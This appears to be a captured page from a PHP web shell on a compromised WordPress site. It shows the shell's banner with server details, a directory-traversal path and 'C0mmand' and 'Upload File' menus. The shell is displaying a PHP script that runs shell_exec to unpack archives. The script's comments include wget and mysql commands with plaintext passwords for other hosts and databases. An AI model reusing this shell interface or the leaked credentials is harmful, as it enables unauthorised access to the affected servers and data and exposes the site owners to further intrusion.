|
Server IP : 10.106.20.4 / Your IP : 216.73.216.140 Web Server : Apache System : Linux webm004.cluster106.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid #1 SMP Fri May 15 02:41:25 UTC 2026 x86_64 User : sylvaineey ( 605664) PHP Version : 7.4.33 Disable Function : _dyuweyrj4,_dyuweyrj4r,dl MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0705) : /home/sylvaineey/www/wp-content/plugins/../../../ |
| [ Home ] | [ C0mmand ] | [ Upload File ] |
|---|
<?php
ini_set('display_errors', 1);
error_reporting(E_ALL);
include('sqdfqsdf.php');
// zipper dans ce repertoire $out = shell_exec("tar cvzf /var/www/vhosts/omega-connect.com/backup_oc_19.03.2018.tgz /var/www/vhosts/omega-connect.com/httpdocs/"); //this works
// dezipper $out = shell_exec("tar xvzf /home/priviconfw/www/randevteam/dev2.pouf-design/backup_access_25.03.2019.tgz");
// dezipper $out = shell_exec("tar xvzf /home/priviconfw/www/randevteam/prestashop1744/backup_test1.03.2019.tgz");
// double dezipper $out = shell_exec("tar -zxvf /var/www/vhosts/projets2-omega-web.net/subdomains/omegaweb.projets2-omega-web.net/drupal-7.latest.tar.gz");
// $out = shell_exec("unzip /home/priviconfw/www/sortez.org/application/application.zip");
// $out = shell_exec("unzip /home/priviconfw/www/testpriviconcept.ovh/application/application.zip");
// $out = shell_exec("unzip /home/priviconfw/www/testpriviconcept.ovh/assets/ckeditor.zip");
$out = shell_exec("tar -xvzf /home/sylvaineey/www/wp-content/uploads/2014.tgz");
// $out = shell_exec("tar cvzf backup_nutriben.tgz /home/priviconfw/www/randevteam/prestashop1744/");
// $out = shell_exec("tar cvzf sortez_test.tgz /home/priviconfw/www/sortez.org/");
// $out = shell_exec("tar xvzf /home/priviconfw/www/randevteam/prestashop1744/backup_nutriben.tgz");
// $out = shell_exec("tar cvzf backup_nutriben.tgz /home/nutribe1/public_html/");
// $out = shell_exec("wget -c https://ftp.drupal.org/files/projects/drupal-8.6.3.zip");
// $out = shell_exec("wget -c https://www.lampe-avenue.fr/backup_18.12.2018.tgz");
// $out = shell_exec("wget -c --user omega --password tz938oTnX6LTFf http://dev.pouf-design.fr/backup_access_14.03.2019.tgz");
// $out = shell_exec("wget -c https://download.prestashop.com/download/releases/prestashop_1.6.1.22.zip?_ga=2.64774255.1784854675.1541527384-13135833.1541527384");
// $out = shell_exec("mysql -h localhost -u dcapmed -p qoHi537# capmed < /var/www/vhosts/projets2-omega-web.net/subdomains/capmed-boutique_2018-04-06_16-23-33.sql");
echo $out;
?>